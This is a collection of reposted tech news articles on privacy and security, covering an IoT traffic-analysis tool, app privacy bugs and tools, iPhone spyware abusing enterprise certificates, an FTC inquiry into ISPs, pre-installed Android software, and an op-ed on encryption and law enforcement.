privacy

Spy on your smart home with this open source research tool

Posted by | chromium, Gadgets, Internet of Things, IoT, IoT Inspector, Princeton University, privacy, privacy research, Security, smart devices, smart home devices, traffic analyzer, WireShark | No Comments

Researchers at Princeton University have built a web app that lets you (and them) spy on your smart home devices to see what they’re up to.

The open source tool, called IoT Inspector, is available for download here. (Currently it’s Mac OS only, with a wait list for Windows or Linux.)

In a blog about the effort the researchers write that their aim is to offer a simple tool for consumers to analyze the network traffic of their Internet connected gizmos. The basic idea is to help people see whether devices such as smart speakers or wi-fi enabled robot vacuum cleaners are sharing their data with third parties. (Or indeed how much snitching their gadgets are doing.)

Testing the IoT Inspector tool in their lab the researchers say they found a Chromecast device constantly contacting Google’s servers even when not in active use.

A Geeni smart bulb was also found to be constantly communicating with the cloud — sending/receiving traffic via a URL (tuyaus.com) that’s operated by a China-based company with a platform which controls IoT devices.

There are other ways to track devices like this — such as setting up a wireless hotspot to sniff IoT traffic using a packet analyzer like WireShark. But the level of technical expertise required makes them difficult for plenty of consumers.

Whereas the researchers say their web app doesn’t require any special hardware or complicated set-up so it sounds easier than trying to go packet sniffing your devices yourself. (Gizmodo, which got an early look at the tool, describes it as “incredibly easy to install and use”.)

One wrinkle: The web app doesn’t work with Safari; requiring either Firefox or Google Chrome (or a Chromium-based browser) to work.

The main caveat is that the team at Princeton do want to use the gathered data to feed IoT research — so users of the tool will be contributing to efforts to study smart home devices.

The title of their research project is Identifying Privacy, Security, and Performance Risks of Consumer IoT Devices. The listed principle investigators are professor Nick Feamster and postdoctoral researcher Danny Yuxing Huang at the university’s Computer Science department.

The Princeton team says it intends to study privacy and security risks and network performance risks of IoT devices. But they also note they may share the full dataset with other non-Princeton researchers after a standard research ethics approval process. So users of IoT Inspector will be participating in at least one research project. (Though the tool also lets you delete any collected data — per device or per account.)

“With IoT Inspector, we are the first in the research community to produce an open-source, anonymized dataset of actual IoT network traffic, where the identity of each device is labelled,” the researchers write. “We hope to invite any academic researchers to collaborate with us — e.g., to analyze the data or to improve the data collection — and advance our knowledge on IoT security, privacy, and other related fields (e.g., network performance).”

They have produced an extensive FAQ which anyone thinking about running the tool should definitely read before getting involved with a piece of software that’s explicitly designed to spy on your network traffic. (tl;dr, they’re using ARP-spoofing to intercept traffic data — a technique they warn may slow your network, in addition to the risk of their software being buggy.)

The dataset that’s being harvesting by the traffic analyzer tool is anonymized and the researchers specify they’re not gathering any public-facing IP addresses or locations. But there are still some privacy risks — such as if you have smart home devices you’ve named using your real name. So, again, do read the FAQ carefully if you want to participate.

For each IoT device on a network the tool collects multiple data-points and sends them back to servers at Princeton University — including DNS requests and responses; destination IP addresses and ports; hashed MAC addresses; aggregated traffic statistics; TLS client handshakes; and device manufacturers.

The tool has been designed not to track computers, tablets and smartphones by default, given the study focus on smart home gizmos. Users can also manually exclude individual smart devices from being tracked if they’re able to power them down during set up or by specifying their MAC address.

Up to 50 smart devices can be tracked on the network where IoT Inspector is running. Anyone with more than 50 devices is asked to contact the researchers to ask for an increase to that limit.

The project team has produced a video showing how to install the app on Mac:

Powered by WPeMatico

Instagram bug showed Stories to the wrong people

Posted by | Apps, Facebook, instagram, Instagram bug, Instagram Privacy, Instagram Stories, Mobile, privacy, Social, TC | No Comments

Today in “Facebook apps are too big to manage,” a glitch caused some users’ Instagram Stories trays to show Stories from people they don’t follow.

TechCrunch first received word of the problem from Twitter user InternetRyan who was confused about seeing strangers in his Stories Tray and tagged me in to investigate. The screenshots below show people in his Stories tray whom he doesn’t follow, as proven by the active Follow buttons on their profiles. TechCrunch inquired about the issue, and the next day Instagram confirmed that a bug was responsible and it had been fixed.

Instagram is still looking into the cause of the bug but says it was solved within hours of being brought to its attention. Luckily, if users clicked on the profile pic of someone they didn’t follow in Stories, Instagram’s privacy controls kicked it and wouldn’t display the content. Facebook Stories wasn’t impacted. But the whole situation shakes faith in the Facebook corporation’s ability to properly route and safeguard our data, including that of the 500 million people using Instagram Stories each day.

An Instagram spokesperson provided this statement: “We’re aware of an issue that caused a small number of people’s Instagram Stories trays to show accounts they don’t follow. If your account is private, your Stories were not seen by people who don’t follow you. This was caused by a bug that we have resolved.”

The problem comes after a rough year for Facebook’s privacy and security teams. Outside of all its scrambling to fight false news and election interference, Facebook and Instagram have experienced an onslaught of technical troubles. A Facebook bug changed the status update composer privacy setting of 14 million users, while another exposed up to 6.8 million users’ unposted photos. Instagram bugs have screwed up follower accounts, and made the feed scroll horizontally. And Facebook was struck by its largest outage ever last month, after its largest data breach ever late last year exposed tons of info on 50 million users.

Facebook and Instagram’s unprecedented scale make them extremely capital efficient and profitable. But that size also leaves tons of surfaces susceptible to problems that can instantly impact huge swaths of the population. Once Facebook has a handle on misinformation, its technical systems could use an audit.

Powered by WPeMatico

New privacy assistant Jumbo fixes your Facebook & Twitter settings

Posted by | amazon alexa, Apps, Facebook, facebook privacy, funding, Fundings & Exits, google search, Mobile, Policy, privacy, Recent Funding, Social, Startups, TC, Twitter, Twitter Privacy | No Comments

Jumbo could be a nightmare for the tech giants, but a savior for the victims of their shady privacy practices.

Jumbo saves you hours as well as embarrassment by automatically adjusting 30 Facebook privacy settings to give you more protection, and by deleting your old tweets after saving them to your phone. It can even erase your Google Search and Amazon Alexa history, with clean-up features for Instagram and Tinder in the works.

The startup emerges from stealth today to launch its Jumbo privacy assistant app on iPhone (Android coming soon). What could take a ton of time and research to do manually can be properly handled by Jumbo with a few taps.

The question is whether tech’s biggest companies will allow Jumbo to operate, or squash its access. Facebook, Twitter and the rest really should have built features like Jumbo’s themselves or made them easier to use, since they could boost people’s confidence and perception that might increase usage of their apps. But since their business models often rely on gathering and exploiting as much of your data as possible, and squeezing engagement from more widely visible content, the giants are incentivized to find excuses to block Jumbo.

“Privacy is something that people want, but at the same time it just takes too much time for you and me to act on it,” explains Jumbo founder Pierre Valade, who formerly built beloved high-design calendar app Sunrise that he sold to Microsoft in 2015. “So you’re left with two options: you can leave Facebook, or do nothing.”

Jumbo makes it easy enough for even the lazy to protect themselves. “I’ve used Jumbo to clean my full Twitter, and my personal feeling is: I feel lighter. On Facebook, Jumbo changed my privacy settings, and I feel safer.” Inspired by the Cambridge Analytica scandal, he believes the platforms have lost the right to steward so much of our data.

Valade’s Sunrise pedigree and plan to follow Dropbox’s bottom-up freemium strategy by launching premium subscription and enterprise features has already attracted investors to Jumbo. It’s raised a $3.5 million seed round led by Thrive Capital’s Josh Miller and Nextview Ventures’ Rob Go, who “both believe that privacy is a fundamental human right,” Valade notes. Miller sold his link-sharing app Branch to Facebook in 2014, so his investment shows those with inside knowledge see a need for Jumbo. Valade’s six-person team in New York will use the money to develop new features and try to start a privacy moment.

How Jumbo works

First let’s look at Jumbo’s Facebook settings fixes. The app asks that you punch in your username and password through a mini-browser open to Facebook instead of using the traditional Facebook Connect feature. That immediately might get Jumbo blocked, and we’ve asked Facebook if it will be allowed. Then Jumbo can adjust your privacy settings to Weak, Medium, or Strong controls, though it never makes any privacy settings looser if you’ve already tightened them.

Valade details that since there are no APIs for changing Facebook settings, Jumbo will “act as ‘you’ on Facebook’s website and tap on the buttons, as a script, to make the changes you asked Jumbo to do for you.” He says he hopes Facebook makes an API for this, though it’s more likely to see his script as against policies.

.

For example, Jumbo can change who can look you up using your phone number to Strong – Friends only, Medium – Friends of friends, or Weak – Jumbo doesn’t change the setting. Sometimes it takes a stronger stance. For the ability to show you ads based on contact info that advertisers have uploaded, both the Strong and Medium settings hide all ads of this type, while Weak keeps the setting as is.

The full list of what Jumbo can adjust includes Who can see your future posts?, Who can see the people?, Pages and lists you follow, Who can see your friends list?, Who can see your sexual preference?, Do you want Facebook to be able to recognize you in photos and videos?, Who can post on your timeline?, and Review tags people add to your posts the tags appear on Facebook? The full list can be found here.

For Twitter, you can choose if you want to remove all tweets ever, or that are older than a day, week, month (recommended), or three months. Jumbo never sees the data, as everything is processed locally on your phone. Before deleting the tweets, it archives them to a Memories tab of its app. Unfortunately, there’s currently no way to export the tweets from there, but Jumbo is building Dropbox and iCloud connectivity soon, which will work retroactively to download your tweets. Twitter’s API limits mean it can only erase 3,200 tweets of yours every few days, so prolific tweeters may require several rounds.

Its other integrations are more straightforward. On Google, it deletes your search history. For Alexa, it deletes the voice recordings stored by Amazon. Next it wants to build a way to clean out your old Instagram photos and videos, and your old Tinder matches and chat threads.

Across the board, Jumbo is designed to never see any of your data. “There isn’t a server-side component that we own that processes your data in the cloud,” Valade says. Instead, everything is processed locally on your phone. That means, in theory, you don’t have to trust Jumbo with your data, just to properly alter what’s out there. The startup plans to open source some of its stack to prove it isn’t spying on you.

While there are other apps that can clean your tweets, nothing else is designed to be a full-fledged privacy assistant. Perhaps it’s a bit of idealism to think these tech giants will permit Jumbo to run as intended. Valade says he hopes if there’s enough user support, the privacy backlash would be too big if the tech giants blocked Jumbo. “If the social network blocks us, we will disable the integration in Jumbo until we can find a solution to make them work again.”

But even if it does get nixed by the platforms, Jumbo will have started a crucial conversation about how privacy should be handled offline. We’ve left control over privacy defaults to companies that earn money when we’re less protected. Now it’s time for that control to shift to the hands of the user.

Powered by WPeMatico

A powerful spyware app now targets iPhone owners

Posted by | Android, app maker, app-store, computing, data security, Facebook, iOS, iPhone, iTunes, Lookout, mobile app, online marketplaces, privacy, Security, spy | No Comments

Security researchers have discovered a powerful surveillance app first designed for Android devices can now target victims with iPhones.

The spy app, found by researchers at mobile security firm Lookout, said its developer abused their Apple-issued enterprise certificates to bypass the tech giant’s app store to infect unsuspecting victims.

The disguised carrier assistance app once installed can silently grab a victim’s contacts, audio recordings, photos, videos and other device information — including their real-time location data. It can be remotely triggered to listen in on people’s conversations, the researchers found. Although there was no data to show who might have been targeted, the researchers noted that the malicious app was served from fake sites purporting to be cell carriers in Italy and Turkmenistan.

Researchers linked the app to the makers of a previously discovered Android app, developed by the same Italian surveillance app maker Connexxa, known to be in use by the Italian authorities.

The Android app, dubbed Exodus, ensnared hundreds of victims — either by installing it or having it installed. Exodus had a larger feature set and expanded spying capabilities by downloading an additional exploit designed to gain root access to the device, giving the app near complete access to a device’s data, including emails, cellular data, Wi-Fi passwords and more, according to Security Without Borders.

Screenshots of the ordinary-looking iPhone app, which was silently uploading a victim’s private data and real-time location to the spyware company’s servers (Image: supplied)

Both of the apps use the same backend infrastructure, while the iOS app used several techniques — like certificate pinning — to make it difficult to analyze the network traffic, Adam Bauer, Lookout’s senior staff security intelligence engineer, told TechCrunch.

“This is one of the indicators that a professional group was responsible for the software,” he said.

Although the Android version was downloadable directly from Google’s app store, the iOS version was not widely distributed. Instead, Connexxa signed the app with an enterprise certificate issued to the developer by Apple, said Bauer, allowing the surveillance app maker to bypass Apple’s strict app store checks.

Apple says that’s a violation of its rules, which prohibits these certificates designed to be used strictly for internal apps to be pushed to consumers.

It follows a similar pattern to several app makers, as discovered by TechCrunch earlier this year, which abused their enterprise certificates to develop mobile apps that evaded the scrutiny of Apple’s app store. Every app served through an app store has to be certified by Apple or they won’t run. But several companies, like Facebook and Google, used their enterprise-only certificates to sign apps given to consumers. Apple said this violated its rules and banned the apps by revoking enterprise certificates used by Facebook and Google, knocking both of their illicit apps offline, but also every other internal app signed with the same certificate.

Facebook was unable to operate at full capacity for an entire working day until Apple issued a new certificate.

The certificate Apple issued to Connexxa (Image: supplied)

But Facebook and Google weren’t the only companies abusing their enterprise certificates. TechCrunch found dozens of porn and gambling apps — not permitted on Apple’s app store — signed with an enterprise certificate, circumventing the tech giant’s rules.

After researchers disclosed their findings, Apple revoked the app maker’s enterprise certificate, knocking every installed app offline and unable to run.

The researchers said they did not know how many Apple users were affected.

Connexxa did not respond to a request for comment. Apple did not comment.

Powered by WPeMatico

WhatsApp’s Brian Acton to talk Signal Foundation and leaving Facebook at Disrupt SF

Posted by | Apps, Brian Acton, Facebook, Mobile, Policy, privacy, signal, signal foundation, Talent, TC, TechCrunch Disrupt SF 2019, WhatsApp | No Comments

“We give them the power. That’s the bad part. We buy their products. We sign up for these websites. Delete Facebook, right?”

That’s WhatsApp founder Brian Acton’s most recent quote about his former employer, Facebook. Acton has seemingly been fueled by his experience running WhatsApp from within Facebook, which has been scrutinized for profiting from collecting data on users.

Which explains why now, two years after leaving Facebook, Acton has found a new groove as founder and executive chairman of the Signal Technology Foundation, a 501(c)(3) nonprofit organization dedicated to doing the foundational work around making private communication accessible, secure and ubiquitous. Acton invested $50 million of his own money to start Signal Foundation in February of 2018.

At TechCrunch Disrupt SF in October, we’ll hear more from Acton about Signal Foundation and his predictions for the future of communication and privacy. And, of course, we’ll try to learn more about what Facebook was up to with WhatsApp, why he left and how it felt leaving $850 million on the table.

Though he was rejected for positions at Facebook and Twitter in 2009, Acton is actually a Silicon Valley veteran, working in the industry (mostly as a software builder) for more than 25 years at places like Apple, Yahoo and Adobe before founding WhatsApp.

The chat app he built with co-founder Jan Koum grew to 1.5 billion users and, eventually, saw a $19 billion buyout from Mark Zuckerberg in 2014. But when Facebook wanted to lay the basis for targeted ads and commercial messaging within the encrypted chat app he’d spent years building, he walked away.

The Signal Foundation is all about ensuring people have access to private communication that doesn’t cost their own personal data.

“We believe there is an opportunity to act in the public interest and make a meaningful contribution to society by building sustainable technology that respects users and does not rely on the commoditization of personal data,” Acton wrote when it was first announced. In many ways, the Signal Foundation is a symbol and a continuation of Acton’s most expensive moral stand.

We’re thrilled to hear from Acton about what’s next at Signal Foundation. We’ll also try to learn more about his exit at Facebook and his feelings about the products he spent so much time building there.

After all, unsavvy regulators, legions of competitors and user backlash have all failed to compel Facebook to treat people better. But the real power lies with the talent that tech giants fight over. When people like Acton speak up or walk out, employers are forced to listen.

“No filter” is Acton’s style, so get ready for some fireworks when we sit down with him onstage at Disrupt SF.

Disrupt SF runs October 2 to October 4 at the Moscone Center. Tickets are available here.

Powered by WPeMatico

Cloudflare’s Warp is a VPN that might actually make your mobile connection better

Posted by | Battlefield, Cloud, cloudflare, Developer, Mobile, privacy, Security, TC, vpn, vpns | No Comments

Since its launch on our stage way back in 2010, Cloudflare has focused on making the internet faster and more modern — but the mobile internet has until recently been beyond its reach. Today the company introduced a new service called Warp described as “the VPN for people who don’t know what VPN stands for.”

In case you’re one of those people, and there’s no shame in it, a VPN is a virtual private network: something that acts as an intermediary between you and the wider internet, allowing you to customize how you connect in many helpful ways, such as changing your apparent location or avoiding IP-based tracking.

The trouble with these services is that many of them just aren’t very good. Trusting a company you’ve never heard of with all your internet traffic just isn’t generally a good idea, and even the biggest and most proven VPN providers are far from household names. What’s more, they can introduce latency and performance issues, which on the mobile web are already trouble enough. In the best case they may take configuration and tweaking that casual users aren’t up to.

Warp, according to a blog post by CEO Matthew Prince, will provide many of the benefits of a VPN with none of the drawbacks, speeding up your connection while adding privacy and security.

“We’ve been tinkering with this idea for three or four years,” Prince told me. Originally there was the idea of making a browser, “but that’s insane,” he said; Apple and Google would crush it. Besides, everything is going app-based and mobile — the real opportunity, they perceived, lay in the layer between those things and the broader internet: “So, a VPN, and it made all the sense in the world for us.”

But they didn’t want to simply compete with a bunch of small providers appealing to a variety of niche power users.

“To be honest, for the vast majority of existing VPN users, this is probably not the right solution for them,” admitted Prince. “If you want to change your country to access Netflix while you’re traveling, there are lots of people that offer that service, but that’s not the market we’re getting into. We wanted something with mass appeal instead of trying to cannibalize what’s out there.”

In order to become a drawback-free default for millions of users, Cloudflare didn’t so much build something from the ground up as adapt nascent work by developers on the cutting edge of networking. It rewrote the already efficient open-source VPN layer created by Wireguard to be even more so, and added a UDP-based protocol created by Neumob, a company it bought in late 2017. Add to this the large network of Cloudflare servers all around the world and it’s a recipe for a quick, secure service that could very well be both better and faster than your existing connection.

You may remember that at this time last year, Cloudflare debuted its DNS service, 1.1.1.1, both for desktops and mobile (via the 1.1.1.1 app). It’s leveraging this presence to offer Warp as an optional and free upgrade.

So what is it? When your mobile wants to make a connection for a Google search or to get an update for an app or whatever, there’s a whole process of reaching out on the internet, finding the right IP to talk to, establishing a secure connection and so on. Cloudflare’s Warp VPN (like other VPNs) takes over this process, encrypting where it otherwise might not be, but also accelerating it by passing the requests over its own network using that Neumob protocol.

The technical aspects will no doubt be exposed and inspected in time, but Cloudflare claims that using Warp should improve your connection and make it more secure, while preventing your DNS lookup data (which says exactly which sites you request to connect to) from being collected and sold. Prince said his post lacked direct comparisons to existing VPNs because they don’t think those are relevant for the millions of non-VPN-using people they’re targeting with Warp.

“Will people do comparisons? Yes. Will I retweet those when they make us look good? Yes,” Prince said. “But we don’t expect to take a lot of users from them. We want the market to expand — we want to be the biggest VPN in the world without taking a single user from any other provider.”

Part of that is the lack of some of existing VPNs’ most attractive features, such as blocking ads at the IP level. Prince said he and the others at the company were uncomfortable with the idea of picking and choosing content, not least because many of their customers are ad-supported sites. “There’s just something creepy about when the internet’s underlying pipes start making editorial decisions,” Prince said. “When we start messing with the contents of a page, even if people want us to, it sets a dangerous precedent.”

Warp can be offered for free because the company is planning a more high-end service that it’ll sell for a monthly fee. Later, an enterprise version could be sold to replace the clunky ones currently out there (which many of our readers likely have already had the pleasure of using). Prince says he envisions a day when a kid can walk into the living room at home and say, “Mom, the internet is being slow, can I use your corporate VPN?” Unlikely, but even CEOs of major infrastructure companies have dreams. Be kind.

Until then, like the rest of Cloudflare’s connectivity suite, Warp will be free and come with few if any caveats.

Well, except one — it’s not available yet. They wanted to make the announcement on April 1 because it’s exactly a year since they announced 1.1.1.1 (get it? 4/1?), but they missed the date. (“I wanted to just turn this on for everyone, but our tech operations team was like, ‘No. You’re not allowed to do that. The network would fall over.’ “) So what you can do now is get the 1.1.1.1 app and request a spot in line. Since they just announced it, the wait probably won’t be that long… oh.

Okay.

Powered by WPeMatico

FTC tells ISPs to disclose exactly what information they collect on users and what it’s for

Posted by | broadband providers, Federal Trade Commission, FTC, Government, isps, Mobile, Policy, privacy | No Comments

The Federal Trade Commission, in what could be considered a prelude to new regulatory action, has issued an order to several major internet service providers requiring them to share every detail of their data collection practices. The information could expose patterns of abuse or otherwise troubling data use against which the FTC — or states — may want to take action.

The letters requesting info (detailed below) went to Comcast, Google, T-Mobile and both the fixed and wireless sub-companies of Verizon and AT&T. These “represent a range of large and small ISPs, as well as fixed and mobile Internet providers,” an FTC spokesperson said. I’m not sure which is meant to be the small one, but welcome any information the agency can extract from any of them.

Since the Federal Communications Commission abdicated its role in enforcing consumer privacy at these ISPs when it and Congress allowed the Broadband Privacy Rule to be overturned, others have taken up the torch, notably California and even individual cities like Seattle. But for enterprises spanning the nation, national-level oversight is preferable to a patchwork approach, and so it may be that the FTC is preparing to take a stronger stance.

To be clear, the FTC already has consumer protection rules in place and could already go after an internet provider if it were found to be abusing the privacy of its users — you know, selling their location to anyone who asks or the like. (Still no action there, by the way.)

But the evolving media and telecom landscape, in which we see enormous companies devouring one another to best provide as many complementary services as possible, requires constant reevaluation. As the agency writes in a press release:

The FTC is initiating this study to better understand Internet service providers’ privacy practices in light of the evolution of telecommunications companies into vertically integrated platforms that also provide advertising-supported content.

Although the FTC is always extremely careful with its words, this statement gives a good idea of what they’re concerned about. If Verizon (our parent company’s parent company) wants to offer not just the connection you get on your phone, but the media you request, the ads you are served and the tracking you never heard of, it needs to show that these businesses are not somehow shirking rules behind the scenes.

For instance, if Verizon Wireless says it doesn’t collect or share information about what sites you visit, but the mysterious VZ Snooping Co (fictitious, I should add) scoops all that up and then sells it for peanuts to its sister company, that could amount to a deceptive practice. Of course it’s rarely that simple (though don’t rule it out), but the only way to be sure is to comprehensively question everyone involved and carefully compare the answers with real-world practices.

How else would we catch shady zero-rating practices, zombie cookies, backdoor deals or lip service to existing privacy laws? It takes a lot of poring over data and complaints by the detail-oriented folks at these regulatory bodies to find things out.

To that end, the letters to ISPs ask for a whole boatload of information on companies’ data practices. Here’s a summary:

  • Categories of personal information collected about consumers or devices, including purposes, methods and sources of collection
  • how the data has been or is being used
  • third parties that provide or are provided this data and what limitations are imposed thereupon
  • how such data is combined with other types of information and how long it is retained
  • internal policies and practices limiting access to this information by employees or service providers
  • any privacy assessments done to evaluate associated risks and policies
  • how data is aggregated, anonymized or deidentified (and how those terms are defined)
  • how aggregated data is used, shared, etc.
  • “any data maps, inventories, or other charts, schematics, or graphic depictions” of information collection and storage
  • total number of consumers who have “visited or otherwise viewed or interacted with” the privacy policy
  • whether consumers are given any choice in collection and retention of data, and what the default choices are
  • total number and percentage of users that have exercised such a choice, and what choices they made
  • whether consumers are incentivized to (or threatened into) opt into data collection and how those programs work
  • any process for allowing consumers to “access, correct, or delete” their personal information
  • data deletion and retention policies for such information

Substantial, right?

Needless to say, some of this information may not be particularly flattering to ISPs. If only 1 percent of consumers have ever chosen to share their information, for instance, that reflects badly on sharing it by default. And if data capable of being combined across categories or services to de-anonymize it, even potentially, that’s another major concern.

The FTC representative declined to comment on whether there would be any collaboration with the FCC on this endeavor, whether it was preliminary to any other action and whether it can or will independently verify the information provided by the ISPs contacted. That’s an important point, considering how poorly these same companies represented their coverage data to the FCC for its yearly broadband deployment report. A reality check would be welcome.

You can read the rest of the letter here (PDF).

Powered by WPeMatico

Mozilla’s free password manager, Firefox Lockbox, launches on Android

Posted by | Android, android apps, Apps, Firefox, Mozilla, password manager, privacy, Security, web browser, Web browsers | No Comments

Mozilla’s free password manager designed for users of the Firefox web browser is today officially arriving on Android. The standalone app, called Firefox Lockbox, offers a simple if a bit basic way for users to access from their mobile device their logins already stored in their Firefox browser.

The app is nowhere near as developed as password managers like 1Password, Dashlane, LastPass and others as it lacks common features like the ability to add, edit or delete passwords; suggest complex passwords; or alert you to potentially compromised passwords resulting from data breaches, among other things.

However, the app is free — and if you’re already using Firefox’s browser, it’s at the very least a more secure alternative to writing down your passwords in an unprotected notepad app, for example. And you can opt to enable Lockbox as an Autofill service on Android.

But the app is really just a companion to Firefox. The passwords in Lockbox securely sync to the app from the Firefox browser — they aren’t entered by hand. For security, the app can be locked with facial recognition or a fingerprint (depending on device support). The passwords are also encrypted in a way that doesn’t allow Mozilla to read your data, it explains in a FAQ.

Firefox Lockbox is now one of several projects Mozilla developed through its now-shuttered Test Flight program. Over a few years’ time, the program had allowed the organization to trial more experimental features — some of which made their way to official products, like the recently launched file-sharing app, Firefox Send.

Others in the program — including Firefox Color⁩⁨Side View⁩⁨Firefox Notes⁩⁨Price Tracker and ⁨Email Tabs⁩ — remain available, but are no longer actively developed beyond occasional maintenance releases. Mozilla’s current focus is on its suite of “privacy-first” solutions, not its other handy utilities.

According to Mozilla, Lockbox was downloaded more than 50,000 times on iOS ahead of today’s Android launch.

The Android version is a free download on Google Play.

Powered by WPeMatico

Android users’ security and privacy at risk from shadowy ecosystem of pre-installed software, study warns

Posted by | Adtech, Advertising Tech, Android, Apps, Facebook, Google, Google Play, Google Play Store, Mobile, pre-installed software, privacy, Security, trackers | No Comments

A large-scale independent study of pre-installed Android apps has cast a critical spotlight on the privacy and security risks that preloaded software poses to users of the Google developed mobile platform.

The researchers behind the paper, which has been published in preliminary form ahead of a future presentation at the IEEE Symposium on Security and Privacy, unearthed a complex ecosystem of players with a primary focus on advertising and “data-driven services” — which they argue the average Android user is unlikely to be unaware of (while also likely lacking the ability to uninstall/evade the baked in software’s privileged access to data and resources themselves).

The study, which was carried out by researchers at the Universidad Carlos III de Madrid (UC3M) and the IMDEA Networks Institute, in collaboration with the International Computer Science Institute (ICSI) at Berkeley (USA) and Stony Brook University of New York (US), encompassed more than 82,000 pre-installed Android apps across more than 1,700 devices manufactured by 214 brands, according to the IMDEA institute.

“The study shows, on the one hand, that the permission model on the Android operating system and its apps allow a large number of actors to track and obtain personal user information,” it writes. “At the same time, it reveals that the end user is not aware of these actors in the Android terminals or of the implications that this practice could have on their privacy.  Furthermore, the presence of this privileged software in the system makes it difficult to eliminate it if one is not an expert user.”

An example of a well-known app that can come pre-installed on certain Android devices is Facebook .

Earlier this year the social network giant was revealed to have inked an unknown number of agreements with device makers to preload its app. And while the company has claimed these pre-installs are just placeholders — unless or until a user chooses to actively engage with and download the Facebook app, Android users essentially have to take those claims on trust with no ability to verify the company’s claims (short of finding a friendly security researcher to conduct a traffic analysis) nor remove the app from their device themselves. Facebook pre-loads can only be disabled, not deleted entirely.

The company’s preloads also sometimes include a handful of other Facebook-branded system apps which are even less visible on the device and whose function is even more opaque.

Facebook previously confirmed to TechCrunch there’s no ability for Android users to delete any of its preloaded Facebook system apps either.

Facebook uses Android system apps to ensure people have the best possible user experience including reliably receiving notifications and having the latest version of our apps. These system apps only support the Facebook family of apps and products, are designed to be off by default until a person starts using a Facebook app, and can always be disabled,” a Facebook spokesperson told us earlier this month.

But the social network is just one of scores of companies involved in a sprawling, opaque and seemingly interlinked data gathering and trading ecosystem that Android supports and which the researchers set out to shine a light into.

In all 1,200 developers were identified behind the pre-installed software they found in the data-set they examined, as well as more than 11,000 third party libraries (SDKs). Many of the preloaded apps were found to display what the researchers dub potentially dangerous or undesired behavior.

The data-set underpinning their analysis was collected via crowd-sourcing methods — using a purpose-built app (called Firmware Scanner), and pulling data from the Lumen Privacy Monitor app. The latter provided the researchers with visibility on mobile traffic flow — via anonymized network flow metadata obtained from its users. 

They also crawled the Google Play Store to compare their findings on pre-installed apps with publicly available apps — and found that just 9% of the package names in their dataset were publicly indexed on Play. 

Another concerning finding relates to permissions. In addition to standard permissions defined in Android (i.e. which can be controlled by the user) the researchers say they identified more than 4,845 owner or “personalized” permissions by different actors in the manufacture and distribution of devices.

So that means they found systematic user permissions workarounds being enabled by scores of commercial deals cut in a non-transparency data-driven background Android software ecosystem.

“This type of permission allows the apps advertised on Google Play to evade Android’s permission model to access user data without requiring their consent upon installation of a new app,” writes the IMDEA.

The top-line conclusion of the study is that the supply chain around Android’s open source model is characterized by a lack of transparency — which in turn has enabled an ecosystem to grow unchecked and get established that’s rife with potentially harmful behaviors and even backdoored access to sensitive data, all without most Android users’ consent or awareness. (On the latter front the researchers carried out a small-scale survey of consent forms of some Android phones to examine user awareness.)

tl;dr the phrase ‘if it’s free you’re the product’ is a too trite cherry atop a staggeringly large yet entirely submerged data-gobbling iceberg. (Not least because Android smartphones don’t tend to be entirely free.)

“Potential partnerships and deals — made behind closed doors between stakeholders — may have made user data a commodity before users purchase their devices or decide to install software of their own,” the researchers warn. “Unfortunately, due to a lack of central authority or trust system to allow verification and attribution of the self-signed certificates that are used to sign apps, and due to a lack of any mechanism to identify the purpose and legitimacy of many of these apps and custom permissions, it is difficult to attribute unwanted and harmful app behaviors to the party or parties responsible. This has broader negative implications for accountability and liability in this ecosystem as a whole.”

The researchers go on to make a series of recommendations intended to address the lack of transparency and accountability in the Android ecosystem — including suggesting the introduction and use of certificates signed by globally-trusted certificate authorities, or a certificate transparency repository “dedicated to providing details and attribution for certificates used to sign various Android apps, including pre-installed apps, even if self-signed”.

They also suggest Android devices should be required to document all pre-installed apps, plus their purpose, and name the entity responsible for each piece of software — and do so in a manner that is “accessible and understandable to users”.

“[Android] users are not clearly informed about third-party software that is installed on their devices, including third-party tracking and advertising services embedded in many pre-installed apps, the types of data they collect from them, the capabilities and the amount of control they have on their devices, and the partnerships that allow information to be shared and control to be given to various other companies through custom permissions, backdoors, and side-channels. This necessitates a new form of privacy policy suitable for preinstalled apps to be defined and enforced to ensure that private information is at least communicated to the user in a clear and accessible way, accompanied by mechanisms to enable users to make informed decisions about how or whether to use such devices without having to root their devices,” they argue, calling for overhaul of what’s long been a moribund T&Cs system, from a consumer rights point of view.

In conclusion they couch the study as merely scratching the surface of “a much larger problem”, saying their hope for the work is to bring more attention to the pre-installed Android software ecosystem and encourage more critical examination of its impact on users’ privacy and security.

They also write that they intend to continue to work on improving the tools used to gather the data-set, as well as saying their plan is to “gradually” make the data-set itself available to the research community and regulators to encourage others to dive in.  

Google has responded to the paper with the following statement — attributed to a spokesperson:

We appreciate the work of the researchers and have been in contact with them regarding concerns we have about their methodology. Modern smartphones include system software designed by their manufacturers to ensure their devices run properly and meet user expectations. The researchers’ methodology is unable to differentiate pre-installed system software — such as diallers, app stores and diagnostic tools–from malicious software that has accessed the device at a later time, making it difficult to draw clear conclusions. We work with our OEM partners to help them ensure the quality and security of all apps they decide to pre-install on devices, and provide tools and infrastructure to our partners to help them scan their software for behavior that violates our standards for privacy and security. We also provide our partners with clear policies regarding the safety of pre-installed apps, and regularly give them information about potentially dangerous pre-loads we’ve identified.
This report was updated with comment from Google

Powered by WPeMatico

Law enforcement needs to protect citizens and their data

Posted by | Android, Australia, Column, computer security, crypto wars, cryptography, encryption, european union, Facebook, Federal Bureau of Investigation, General Data Protection Regulation, human rights, law, law enforcement, national security, privacy, Security, United Kingdom | No Comments
Robert Anderson
Contributor

Robert Anderson served for 21 years in the FBI, retiring as executive assistant director of the Criminal, Cyber, Response and Services Branch. He is currently an advisor at The Chertoff Group and the chief executive of Cyber Defense Labs.

Over the past several years, the law enforcement community has grown increasingly concerned about the conduct of digital investigations as technology providers enhance the security protections of their offerings—what some of my former colleagues refer to as “going dark.”

Data once readily accessible to law enforcement is now encrypted, protecting consumers’ data from hackers and criminals. However, these efforts have also had what Android’s security chief called the “unintended side effect” of also making this data inaccessible to law enforcement. Consequently, many in the law enforcement community want the ability to compel providers to allow them to bypass these protections, often citing physical and national security concerns.

I know first-hand the challenges facing law enforcement, but these concerns must be addressed in a broader security context, one that takes into consideration the privacy and security needs of industry and our citizens in addition to those raised by law enforcement.

Perhaps the best example of the law enforcement community’s preferred solution is Australia’s recently passed Assistance and Access Bill, an overly-broad law that allows Australian authorities to compel service providers, such as Google and Facebook, to re-engineer their products and bypass encryption protections to allow law enforcement to access customer data.

While the bill includes limited restrictions on law enforcement requests, the vague definitions and concentrated authorities give the Australian government sweeping powers that ultimately undermine the security and privacy of the very citizens they aim to protect. Major tech companies, such as Apple and Facebook, agree and have been working to resist the Australian legislation and a similar bill in the UK.

